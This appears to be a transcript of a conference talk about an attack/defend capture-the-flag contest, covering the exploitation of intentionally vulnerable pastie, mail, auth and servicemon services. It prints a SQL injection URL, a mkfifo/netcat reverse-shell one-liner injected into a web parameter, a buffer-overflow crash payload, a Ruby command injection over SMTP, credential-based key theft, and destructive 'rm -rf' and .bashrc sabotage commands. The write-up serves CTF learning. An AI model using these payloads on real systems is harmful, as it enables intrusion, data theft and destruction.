Playing 44CON CTF for fun and profit
5 likes1,422 views
The document summarizes the author's experience playing a capture the flag (CTF) competition called the 44Con CTF. It describes recon activities like scanning services to identify vulnerabilities. Several services are found to have exploitable issues, including a pastie service with SQL injection, a mail server with remote code execution, and an authentication service with a stack buffer overflow. The author is able to exploit these issues to steal flags, gain a remote shell, and eventually escalate privileges to root through service restart hijacking and a mail service vulnerability. Overall it provides a play-by-play of the reconnaissance and exploitation steps taken during the CTF.
![Auth - exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x403000 0x3000 0x0 /services/auth/auth
0x602000 0x603000 0x1000 0x2000 /services/auth/auth
0x603000 0x604000 0x1000 0x3000 /services/auth/auth
0x604000 0x625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]](https://image.slidesharecdn.com/playing44conctf-121121054740-phpapp02/85/Playing-44CON-CTF-for-fun-and-profit-42-320.jpg)
![Auth - exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000 400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000 602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000 603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000 604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)](https://image.slidesharecdn.com/playing44conctf-121121054740-phpapp02/85/Playing-44CON-CTF-for-fun-and-profit-43-320.jpg)
![Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
Now we can have some fun!](https://image.slidesharecdn.com/playing44conctf-121121054740-phpapp02/85/Playing-44CON-CTF-for-fun-and-profit-50-320.jpg)
![Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted
# whoami
root](https://image.slidesharecdn.com/playing44conctf-121121054740-phpapp02/85/Playing-44CON-CTF-for-fun-and-profit-59-320.jpg)
Playing 44CON CTF for fun and profit
- 1. Playing the 44Con CTF for fun & profit
- 3. Me Software developer Trying not to make things worse Know a lot about bugs CTF team 0xbadf00d Contributor to io.smashthestack.org
- 4. CTF Solving technical security challenges to get points. "It's kind of like a Computer Science exam on acid"* * CSAW CTF "About"page
- 5. CTF Types Challenge-based DEF CON quals Ghost In The Shellcode CSAW CTF Attack/defend DEF CON finals 44Con CTF (this year)
- 6. 44CON CTF
- 7. 44CON CTF - What we got Virtual Machine image IP Address Scope of "attackable" machines
- 8. Attack & Defend Kind of like a pentest (maybe, I've never done a pentest) I have a plan: Recon Harden Write exploits Run riot Get the girl Save the world
- 9. Step 1 - Recon I'd rather be offline than owned Self-recon Capture traffic Quick nmap of non-player servers
- 10. Recon - Services
- 11. Recon - Services
- 12. Recon - Scoring Regular "scoring rounds" Score server stores new keys in services Score server checks for previous keys? Every 30 minutes Not great if you're trying to see talks!
- 13. pastie
- 14. Pastie
- 15. Pastie
- 16. Pastie Written in PHP Pastes stored in a MySQL database Recon shows keys are stored as pastes PHP+MySQL - Can you tell what the vuln is yet?
- 17. Pastie vuln
- 18. Pastie vuln C Classic SQL injection
- 19. Pastie fix It's not all pwnpwnpwn Not very sexy Updated to use prepared statements
- 20. Pastie exploit I want keys! Had a look at my own DB to figure out the query
- 21. Pastie exploit https://ip/view/%'+and+lang+=+'text'+order +by+date+desc+--+
- 22. Pastie exploit
- 23. Pastie exploit - scripted
- 24. mailserver
- 25. Mailserver SMTP and POP3 server Keys are stored in emails Written in Ruby I don't know Ruby ~ 500 lines
- 27. Mailserver - vulnerability ??? This just runs whatever Ruby code you give it Time to learn Ruby!
- 28. Mailserver - verification Looking at the logs...
- 29. Mailserver - exploitation I'm sure Ruby is lovely... ... but let's just find some code to copy
- 32. Mailserver - scripted exploitation
- 33. auth
- 34. Auth Running on port 23500
- 35. Auth
- 36. Auth - vulnerability Source analysis 101
- 38. Auth - exploitation Classic stack buffer overflow Overwrite return address with value of my choice Remote code execution..... ....right?
- 39. Auth - exploitation Welcome to CTF rage
- 41. Auth - exploitation Just put a valid writable address in the buffer ptr! Easy if this was a 32bit process. Our memory space is annoying.
- 42. Auth - exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
- 43. Auth - exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x0000000000 400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000 602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000 603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000 604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
- 44. Auth - exploitation Time's up! No remote code execution :-( Very limited DoS Crash process Restarts automatically
- 45. servicemon
- 46. Servicemon Web page Looks like it monitors the other services Ruby again
- 47. Servicemon - vulnerability Command execution of "filelist" parameter
- 48. Servicemon - exploitation Never mind keys, I want a shell contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
- 49. Servicemon - exploitation *cracks knuckles* rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20% 2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff% 3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh% 20-i%202>%261%7Cnc%20192.168.1.75% 2031337%20>%2Ftmp%2Ff
- 50. Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from 192.168.1.72 port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon Now we can have some fun!
- 51. rampage
- 52. Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys * | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
- 53. Leave a calling card echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
- 54. Annoy echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc echo exit >> ~/.bashrc rm -rf /services
- 55. escalation
- 56. Escalation Getting keys is fine Getting shells is better Getting root is best
- 57. Escalation - the hard way $ find /etc -writable /etc/init/mail.conf /etc/init/auth.conf
- 58. Escalation - the hard way USER PID TTY STAT COMMAND root 8680 ? Ss /services/auth/auth
- 59. Escalation - the hard way Next time auth respawns we will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root
- 60. Escalation - the easy way 220 Mail Service ready (33147) HELO 250 Requested mail action okay, completed EXPN respond(client, `whoami`) root
- 61. summary
- 62. Summary CTFs are fun! http://smashthestack.org - start with io http://overthewire.org http://hackthissite.org
- 63. questions